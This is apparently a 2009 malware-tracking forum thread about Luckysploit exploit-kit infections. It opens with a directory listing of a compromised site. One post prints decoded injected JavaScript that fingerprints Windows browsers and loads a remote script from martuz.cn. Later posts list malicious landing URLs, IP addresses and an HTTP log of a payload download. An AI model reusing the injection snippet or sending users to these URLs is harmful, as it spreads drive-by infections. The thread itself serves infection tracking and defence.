mywebdesignonline.co.uk/bangingdrum/
mywebdesignonline.co.uk/barimage.bmp
mywebdesignonline.co.uk/c00lttube/
mywebdesignonline.co.uk/calladriver/
mywebdesignonline.co.uk/campement/
mywebdesignonline.co.uk/cgi-bin/
mywebdesignonline.co.uk/children/
mywebdesignonline.co.uk/cpd.tar
mywebdesignonline.co.uk/cpd/
mywebdesignonline.co.uk/crm/
mywebdesignonline.co.uk/cycletop2bottom/
mywebdesignonline.co.uk/df2151/
mywebdesignonline.co.uk/dvd/
mywebdesignonline.co.uk/e0mbvt8/
mywebdesignonline.co.uk/ecommerce/
mywebdesignonline.co.uk/editable/
mywebdesignonline.co.uk/el5r43/
mywebdesignonline.co.uk/esj/
mywebdesignonline.co.uk/f4r0slk/
mywebdesignonline.co.uk/fh6px94/
mywebdesignonline.co.uk/findasolicitor/
mywebdesignonline.co.uk/foods.jpg
mywebdesignonline.co.uk/ftpviaphp.php
mywebdesignonline.co.uk/g3b0eyr/
mywebdesignonline.co.uk/gmnews/
mywebdesignonline.co.uk/googleb5ce9839f49a5a46.html
mywebdesignonline.co.uk/Holiday%20in%20Mauritius/
mywebdesignonline.co.uk/hxoos8d/
mywebdesignonline.co.uk/images/
mywebdesignonline.co.uk/imavkq/
mywebdesignonline.co.uk/info.php
mywebdesignonline.co.uk/jacapella/
mywebdesignonline.co.uk/jacappella/
mywebdesignonline.co.uk/joomla/
mywebdesignonline.co.uk/l9qmjo/
mywebdesignonline.co.uk/lf2fbz/
mywebdesignonline.co.uk/LT/
mywebdesignonline.co.uk/m9vytvi/
mywebdesignonline.co.uk/marthas/
mywebdesignonline.co.uk/Mick/
mywebdesignonline.co.uk/mtpa/
mywebdesignonline.co.uk/ogt1mg3/
mywebdesignonline.co.uk/oobfjit/
mywebdesignonline.co.uk/otu75rl/
mywebdesignonline.co.uk/oz0hmiq/
mywebdesignonline.co.uk/p1rihnu/
mywebdesignonline.co.uk/philip/
mywebdesignonline.co.uk/phpmyadmin/
mywebdesignonline.co.uk/pkp2xky/
mywebdesignonline.co.uk/plwork/
mywebdesignonline.co.uk/postinfo.html
mywebdesignonline.co.uk/qey83j/
mywebdesignonline.co.uk/qzacvv/
mywebdesignonline.co.uk/reg.html
mywebdesignonline.co.uk/robots.txt
mywebdesignonline.co.uk/ru.php
mywebdesignonline.co.uk/skjlg7w/
mywebdesignonline.co.uk/software/
mywebdesignonline.co.uk/SUD/
mywebdesignonline.co.uk/SWiSHmax_build_2004%5b1%5d.02.03.zip
mywebdesignonline.co.uk/t027pw/
mywebdesignonline.co.uk/talentbubble/
mywebdesignonline.co.uk/test.pl
mywebdesignonline.co.uk/thinkwell/
mywebdesignonline.co.uk/tools/
mywebdesignonline.co.uk/type23/
mywebdesignonline.co.uk/UserFiles.rar
mywebdesignonline.co.uk/userfiles/
mywebdesignonline.co.uk/vincent/
mywebdesignonline.co.uk/vishal/
mywebdesignonline.co.uk/wqtzkh/
mywebdesignonline.co.uk/wv8l2r/
mywebdesignonline.co.uk/wydy5n9/
mywebdesignonline.co.uk/x03e7f9/
mywebdesignonline.co.uk/xcbtalj/
mywebdesignonline.co.uk/z30em4/
Title: Re: another Luckysploit IP
Post by: MysteryFCM on August 09, 2009, 09:02:20 am
Aww, it's our old friends, lol ....

/_vti_inf.html

JS in the above file decodes to;

Code: [Select]
var a="ScriptEngine",b="Version()+",j="",u=navigator.userAgent;if((u.indexOf("Chrome")<0)&&(u.indexOf("Win")>0)&&(u.indexOf("NT 6")<0)&&(document.cookie.indexOf("miek=1")<0)&&(typeof(zrvzts)!=typeof("A"))){zrvzts="A";eval("if(window."+a+")j=j+"+a+"Major"+b+a+"Minor"+b+a+"Build"+b+"j;");document.write("<script src=//mar"+"tuz.cn/vid/?id="+j+"><\/script>");}
Could've sworn martuz.cn was already offline?

/edit

Just phoned EUKHost and was told to e-mail them as he can't deal with it till tomorrow (doesn't work Sundays apparently), so have fired an e-mail off.
Title: Re: another Luckysploit IP
Post by: MysteryFCM on August 10, 2009, 08:07:00 pm
EUKHost have been in touch to tell me the owner has taken this domain offline.
Title: Re: another Luckysploit IP
Post by: Malware-Web-Threats on September 10, 2009, 08:37:39 am
Code: [Select]
94.75.216.181/dope/?d28e33f30013d909cd5db615562e2690
mylipc.com/hjjh/?7b0d33b2f1acb347aca386aa39ea3046
lingobest.com/vsetakoe/?21983bb0a2f5476c0c4aac31c7549f5b
firesaverbest.com/vsetakoe/?21983bb0a2f5476c0c4aac31c7549f5b
sebastienleabse.com/sou/?0ba3a2a491026e837182ada457aa4796
sebastienleabse.com/sou/?GO++lqB32ZMxU401Y/JSCNxtAN1fkbGHDq4Sz0pzRA== (pdf)
83.133.113.14/sou/?0ba3a2a491026e837182ada457aa4796
83.133.113.14/sou/?GO++lqB32ZMxU401Y/JSCNxtAN1fkbGHDq4Sz0pzRA== (pdf)

redirects to luckysploit:
85.10.221.162
Code: [Select]
mega-tracker.info/in.cgi?4Wepawet (http://wepawet.iseclab.org/view.php?hash=f189dc8e57d9d60d55290b67cc91ed7a&t=1252569753&type=js)
Code: [Select]
wareshield.cn/jst.js
Wepawet (http://wepawet.iseclab.org/view.php?hash=59c52491c4a6b704851f9715c42958da&t=1252571719&type=js)
Title: Re: another Luckysploit IP
Post by: Serg on September 10, 2009, 12:25:55 pm
Hi 2 all
Im trying to analyse compromised web site
Code: [Select]
http://www.comanda-parfum.com/But i got some problems...
I got pdf sploits and malware but i got a problems with attached file. it was downloaded with following headers
Quote
Request-ID: 13

GET hxxp://212.174.200.114/.cuo/?Z2xd/S8ZgwjJgt+hbVMvAG0dhSABFtvNQO7IQrnip+o= HTTP/1.0
Host: 212.174.200.114
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-gb,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: hxxp://212.174.200.114/.cuo/?934db28b45fa5186d3f0158e2f52ac83
Cookie: login=262bb56a675e3a0a21db4b558f7ce3a2
----
Answer-ID: 13

HTTP/1.0 200 OK
Date: Thu, 10 Sep 2009 06:39:51 GMT
Content-Type: text/html
X-Powered-By: PHP/5.1.6
Content-Encoding: gzip
Content-Length: 3988
X-Cache: MISS from chicken-machine
X-Cache-Lookup: MISS from chicken-machine:3128
Connection: keep-alive
Proxy-Connection: keep-alive

Under Gzip i suspect base64 encoding but what is inside? Any ideas? Please?
Title: Re: another Luckysploit IP
Post by: michajp on September 12, 2009, 02:23:35 pm
Code: [Select]
hxxp://195.88.190.235/irri/?1bd3f86ca81712ec6a45340cbc884491
Title: Re: another Luckysploit IP
Post by: michajp on September 13, 2009, 01:39:57 am
Code: [Select]
hxxp://locationlite.com/medow/?c42fb9fe6092adcbeb2bd40c788a50a2
Title: Re: another Luckysploit IP
Post by: michajp on September 18, 2009, 01:03:54 am
This site contains iFramer (but gets cleaned and reinfected several times, it sems):

Code: [Select]
hxxp://0koryu0.easter.ne.jp/
http://wepawet.iseclab.org/view.php?hash=87191810fafdd9fe9bc88fac973d712c&t=1253235673&type=js

... which leads to Luckysploit site:

Code: [Select]
hxxp://212.174.200.114/.cuo/?fef5293d546b749a15d4c5c487f39109
Title: Re: another Luckysploit IP
Post by: michajp on September 22, 2009, 08:50:02 am
Now

Code: [Select]
hxxp://step2me.net/.dif/go.php?sid=1&
leading to same as former post:

Code: [Select]
hxxp://212.174.200.114/.cuo/?fef5293d546b749a15d4c5c487f39109
Title: Re: another Luckysploit IP
Post by: michajp on September 22, 2009, 01:52:29 pm
Code: [Select]
hxxp://poohfamily.client.jp/
Containing iframe:

Code: [Select]
hxxp://pipetro.org/irri/?3230c8ac92458eb62ed568fa43ed2a08